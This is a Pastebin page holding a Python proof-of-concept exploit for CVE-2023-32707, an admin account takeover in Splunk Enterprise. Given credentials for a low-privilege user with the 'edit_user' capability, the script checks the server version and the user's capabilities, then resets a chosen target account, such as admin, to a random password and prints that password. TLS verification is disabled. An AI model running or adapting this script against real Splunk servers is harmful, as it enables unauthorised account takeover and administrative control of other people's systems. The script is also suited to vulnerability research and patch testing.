FlyFar

Splunk 9.0.5 - Admin Account Takeover - CVE-2023-32707

Jan 17th, 2024
113
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 3.68 KB | Cybersecurity | 0 0
  1. #!/usr/bin/env python3
  2. #
  3. # Exploit Title: Splunk 9.0.5 - admin account take over
  4. # Author: [Redway Security](https://twitter.com/redwaysec))
  5. # Discovery: [Santiago Lopez](https://twitter.com/santi_lopezz99)
  6.  
  7. #CVE: CVE-2023-32707
  8.  
  9. # Vendor Description: A low-privilege user who holds a role that has the `edit_user` capability assigned
  10. # to it can escalate their privileges to that of the admin user by providing specially crafted web requests.
  11. #
  12. # Versions Affected: Splunk Enterprise **below** 9.0.5, 8.2.11, and 8.1.14.
  13. #
  14. import argparse
  15. import requests
  16. import random
  17. import string
  18. import base64
  19. # ignore warnings
  20. import urllib3
  21. urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
  22.  
  23. # Parse command-line arguments
  24. parser = argparse.ArgumentParser(description='Splunk Authentication')
  25. parser.add_argument('--host', required=True, help='Splunk host or IP address')
  26. parser.add_argument('--username', required=True, help='Splunk username')
  27. parser.add_argument('--password', required=True, help='Splunk password')
  28. parser.add_argument('--target-user', required=True, help='Target user')
  29. parser.add_argument('--force-exploit', action='store_true',
  30. help='Force exploit')
  31.  
  32. args = parser.parse_args()
  33.  
  34. # Splunk server settings
  35. splunk_host = args.host.split(':')[0]
  36. splunk_username = args.username
  37. splunk_password = args.password
  38. target_user = args.target_user
  39. force_exploit = args.force_exploit
  40.  
  41. splunk_port = args.host.split(':')[1] if len(args.host.split(':')) > 1 else 8089
  42. user_endpoint = f"https://{splunk_host}:{splunk_port}/services/authentication/users"
  43.  
  44. credentials = f"{splunk_username}:{splunk_password}"
  45. base64_credentials = base64.b64encode(credentials.encode()).decode()
  46. headers = {
  47. 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0',
  48. 'Authorization': f'Basic {base64_credentials}'
  49.  
  50. }
  51. proxies = {
  52. # 'http': '[http://127.0.0.1:8080'](<a href=),">http://127.0.0.1:8080',
  53. # 'https': 'http://127.0.0.1:8080'
  54. }
  55.  
  56. response = requests.get(f"{user_endpoint}/{splunk_username}?output_mode=json",
  57. headers=headers, proxies=proxies, verify=False)
  58.  
  59. if response.status_code == 200:
  60. affected_versions = ['9.0.4', '8.2.10', '8.1.13']
  61. user = response.json()
  62. splunk_version = user['generator']['version']
  63. # This is not a good way to compare versions.
  64. # There is a range of versions that are affected by this CVE, but this is just a PoC
  65. # 8.1.0 to 8.1.13
  66. # 8.2.0 to 8.2.10
  67. # 9.0.0 to 9.0.4
  68. print(f"Detected Splunk version '{splunk_version}'")
  69. if any(splunk_version <= value for value in affected_versions) or force_exploit:
  70. user_capabilities = user['entry'][0]['content']['capabilities']
  71. if 'edit_user' in user_capabilities:
  72. print(
  73. f"User '{splunk_username}' has the 'edit_user' capability, which would make this target exploitable.")
  74. new_password = ''.join(random.choice(
  75. string.ascii_letters + string.digits) for _ in range(8))
  76. change_password_payload = {
  77. 'password': new_password,
  78. 'force-change-pass': 0,
  79. 'locked-out': 0
  80. }
  81. response = requests.post(f"{user_endpoint}/{target_user}?output_mode=json",
  82. data=change_password_payload, headers=headers, proxies=proxies, verify=False)
  83. if response.status_code == 200:
  84. print(
  85. f"Successfully taken over user '{target_user}', log into Splunk with the password '{new_password}'")
  86. else:
  87. print('Account takeover failed')
  88. else:
  89. print(
  90. f"User '{splunk_username}' does not have the 'edit_user' capability, which makes this target not exploitable by this user.")
  91. else:
  92. print(f"Splunk version '{splunk_version}' is not affected by CVE-2023-32707")
  93. else:
  94. print(
  95. f"Couldn't authenticate to Splunk server '{splunk_host}' with user '{splunk_username}' and password '{splunk_password}'")
  96. exit(1)
  97.            
Add Comment
Please, Sign In to add comment